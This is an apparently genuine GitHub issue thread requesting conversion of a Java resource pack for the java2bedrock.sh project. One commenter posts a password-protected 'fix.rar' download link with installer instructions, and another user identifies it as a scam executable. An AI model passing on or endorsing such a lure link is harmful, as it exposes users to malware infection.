### ISSUE TITLE
[Pack]: ff

### ISSUE THREAD

**Issue by Sthuhai** [Kas-tle/java2bedrock.sh#33404]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/b8qupni908zhjg6ef029h/generated.zip?rlkey=8ofbijgcizidzzc0nx7jpyxwy&st=64alj3ec&dl=0

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by lolwhatdidigetbanned** [comment]
are you fixing my itemsadder?

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by lolwhatdidigetbanned** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

scam link dont do it

**Comment by lolwhatdidigetbanned** [comment]
i opened on my phone and it was a exe
i hate scammer use tria.ge
